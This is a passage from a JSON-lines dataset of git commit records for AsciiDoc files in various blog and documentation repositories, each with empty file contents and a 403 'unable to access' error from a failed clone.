2016-11-10-On-choosing-careers.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-11-10-On-choosing-careers.adoc","new_file":"_posts\/2016-11-10-On-choosing-careers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76270eaf65b333a65db3faa321a44e09e67059b1","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c856ddfc3e9b14ea9be52d5c3ed709e32bd1a780","subject":"Fix travis build failure due to missing modules folder","message":"Fix travis build failure due to missing modules folder\n","repos":"hawkular\/hawkular-apm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-btm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,objectiser\/hawkular-apm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-apm","old_file":"feature-pack\/src\/main\/resources\/modules\/README.adoc","new_file":"feature-pack\/src\/main\/resources\/modules\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpkrohling\/hawkular-apm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"058828ac11971800c3c2c3c7cf8d374002a6a0ce","subject":"Create CODE_OF_CONDUCT.adoc","message":"Create CODE_OF_CONDUCT.adoc","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74801ef6f0e8d227a0058754bc5cf403576945cc","subject":"add blog article","message":"add blog article\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"764917b7982520e01327fcf858ccceb1fd96b148","subject":"fix(glossary): chore ES6 Promises","message":"fix(glossary): chore ES6 Promises\n","repos":"lidasong2014\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,mzbac\/promises-book,azu\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,liubin\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,azu\/promises-book,mzbac\/promises-book,sunfurong\/promise,purepennons\/promises-book,genie88\/promises-book,oToUC\/promises-book,oToUC\/promises-book,genie88\/promises-book,dieface\/promises-book,dieface\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,sunfurong\/promise,purepennons\/promises-book,mzbac\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,wenber\/promises-book,oToUC\/promises-book","old_file":"Glossary\/readme.adoc","new_file":"Glossary\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced38e37edaf194a7e6f17a17d11b65b30c074f9","subject":"y2b create post Massive 4X iPad Mini Giveaway!","message":"y2b create post Massive 4X iPad Mini Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-08-Massive-4X-iPad-Mini-Giveaway.adoc","new_file":"_posts\/2013-03-08-Massive-4X-iPad-Mini-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a294bf59edffbd3c68a93652386f894ef9664eb2","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe0be9dc507ed37326c2a33760a2b898acc095e0","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-mongodb,gravitee-io\/gravitee-repository-mongodb","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7325df674a8ae01077e4a545f4a2a1cd32ffc56d","subject":"Update 2015-02-24-need-h1-to-save.adoc","message":"Update 2015-02-24-need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0221d5c42c329c22c96f48dc79e94e8d73b468e","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0349ef934cfff744cd7bc7a4311812e01fea004","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60dbe907e8087973c39181034214ec64e93cd0cb","subject":"Update 2015-09-12-Eka-postaus.adoc","message":"Update 2015-09-12-Eka-postaus.adoc","repos":"mikaman\/mikaman.github.io,mikaman\/mikaman.github.io,mikaman\/mikaman.github.io","old_file":"_posts\/2015-09-12-Eka-postaus.adoc","new_file":"_posts\/2015-09-12-Eka-postaus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikaman\/mikaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b00be2e513f12ded14d4432278df7a2dacb217d","subject":"Update 2015-09-25-Second-post.adoc","message":"Update 2015-09-25-Second-post.adoc","repos":"spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress","old_file":"_posts\/2015-09-25-Second-post.adoc","new_file":"_posts\/2015-09-25-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spe\/spe.github.io.hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af2bf0e2d042ba4746686c60eaa5402823b19025","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f2ecb7096d5c85816c467b57eb8fa6e8fb7a805","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f02b0783fbec98f47a9b0aa9a1367cfa080868a0","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c378ca461072fe757c3035a80f0dd2757dac0ee2","subject":"Add in ClojureBridge Event Page","message":"Add in ClojureBridge Event Page\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojurebridge.adoc","new_file":"content\/events\/2020\/clojurebridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"185181f659bf6cc6cf33e7876ca6e45d62070d82","subject":"Marked source Java","message":"Marked source Java\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Syntax\/Interfaces.adoc","new_file":"Syntax\/Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab9778575fd564bcb00f90e50a3f7976a94af22b","subject":"y2b create post Is This The Steam Box? (Xi3 X5A Unboxing \\u0026 Overview)","message":"y2b create post Is This The Steam Box? (Xi3 X5A Unboxing \\u0026 Overview)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-01-Is-This-The-Steam-Box-Xi3-X5A-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-02-01-Is-This-The-Steam-Box-Xi3-X5A-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77c3ebe4dfc29201534c592da570ee58e049d3b2","subject":"Fixed readme roadmap links","message":"Fixed readme roadmap links","repos":"bjartek\/oc-cluster-wrapper,openshift-evangelists\/oc-cluster-wrapper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/oc-cluster-wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af250857e80c375adf0357f86509c17da6fcc708","subject":"added README","message":"added README\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b09648005536e62f77c9d738ffe7dab576df0c8","subject":"Added initial README file","message":"Added initial README file\n","repos":"GoodGrind\/ghostwriter-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoodGrind\/ghostwriter-api.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"381e85e8ce7ad5940c045d2c28d28ef006c35d1d","subject":"Initial revision for catalog plugin doc","message":"Initial revision for catalog plugin doc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/catalog_plugin.adoc","new_file":"userguide\/tutorials\/catalog_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b1d1ad12d5f3471b427703f8a4f45b3a10d292e","subject":"Flesh out the introduction a bit more","message":"Flesh out the introduction a bit more\n\nChange-Id: I83091a4c8d457b03041df74014e6933f9338c478\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7099\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acbd912d9f457922e18305b5bea0ba68817f1b3","subject":"Adding 'Debezium Evolving' post","message":"Adding 'Debezium Evolving' post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-10-26-debezium-evolving.adoc","new_file":"_posts\/2022-10-26-debezium-evolving.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b552b96eb63b1c052ed791b3aeb19790afa3f4c8","subject":"Update 19-02-2015-Python-para-Principiantes.adoc","message":"Update 19-02-2015-Python-para-Principiantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/19-02-2015-Python-para-Principiantes.adoc","new_file":"_posts\/19-02-2015-Python-para-Principiantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90cd4cf57d38b2b95cd00bf075633db730e0aff7","subject":"Update 2016-02-17-Thinking-in-Microservices.adoc","message":"Update 2016-02-17-Thinking-in-Microservices.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2016-02-17-Thinking-in-Microservices.adoc","new_file":"_posts\/2016-02-17-Thinking-in-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0efd6666cb0b5dc707dfbbfb74e1c08c68c27ea3","subject":"Initializing openshift-docs repo","message":"Initializing openshift-docs repo\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d7e8d47764eea218d37e7392435e1d71fc7b56c","subject":"job: #11745 first draft of analysis","message":"job: #11745 first draft of analysis\n","repos":"keithbrown\/mc,rmulvey\/mc,xtuml\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_ant.adoc","new_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c70e5df829c2fbb4db6307627f8e096a6da8e08","subject":"release notes: add contributor counts","message":"release notes: add contributor counts\n\nChange-Id: Ib385b93671056c37474367266291370d7893550c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7848\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99cc7fd0025630c0169e64f1487e30ca81c6632f","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b21ba96fca46f3e9b322b7913eacb38b6602e32","subject":"Update 2016-12-11-my-second-post.adoc","message":"Update 2016-12-11-my-second-post.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-11-my-second-post.adoc","new_file":"_posts\/2016-12-11-my-second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e375b3f900b0aa90ddacbbdfde40cbb8c16bfb36","subject":"Update glslc manual about -working-directory.","message":"Update glslc manual about -working-directory.\n","repos":"dneto0\/shaderc,dneto0\/shaderc,drewet\/shaderc,antiagainst\/shaderc,Qining\/shaderc,antiagainst\/shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,Qining\/shaderc,Qining\/shaderc,AWoloszyn\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,drewet\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,drewet\/shaderc,AWoloszyn\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Qining\/shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f69f1efcfe414fc7c53046ffb93adcc10515f2d","subject":"Update 2015-05-07-WFP-Bookmarklet.adoc","message":"Update 2015-05-07-WFP-Bookmarklet.adoc","repos":"mtx69\/mtx69.github.io,mtx69\/mtx69.github.io,mtx69\/mtx69.github.io","old_file":"_posts\/2015-05-07-WFP-Bookmarklet.adoc","new_file":"_posts\/2015-05-07-WFP-Bookmarklet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mtx69\/mtx69.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ca4e7b41b74ed3ef1cdb7bc3a84d771accb5a4a","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4519c1b782205a04b9ce4874e3f62f72da9675","subject":"Update 2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","message":"Update 2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","new_file":"_posts\/2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35febb667b975fa7eeca63426fd368a2730c844d","subject":"y2b create post They Call Them SleepPhones...","message":"y2b create post They Call Them SleepPhones...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-20-They-Call-Them-SleepPhones.adoc","new_file":"_posts\/2016-06-20-They-Call-Them-SleepPhones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0da9af80df439de55fe761699353873feeda828","subject":"Update 2017-03-14-First-Post.adoc","message":"Update 2017-03-14-First-Post.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"424f8ca72d000ad8a1c44e66b6d4511486c2b10e","subject":"Rx examples README","message":"Rx examples README\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"rx-examples\/README.adoc","new_file":"rx-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59cebbf7de7d9ee53c954c3b395c93f6ad18eba1","subject":"Update 2016-07-15-If-you-could-have-a-superpower.adoc","message":"Update 2016-07-15-If-you-could-have-a-superpower.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-If-you-could-have-a-superpower.adoc","new_file":"_posts\/2016-07-15-If-you-could-have-a-superpower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b43fc8c5238ece5e6e660c669c8be0bf2282a1be","subject":"Fixed image, added header.","message":"Fixed image, added header.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 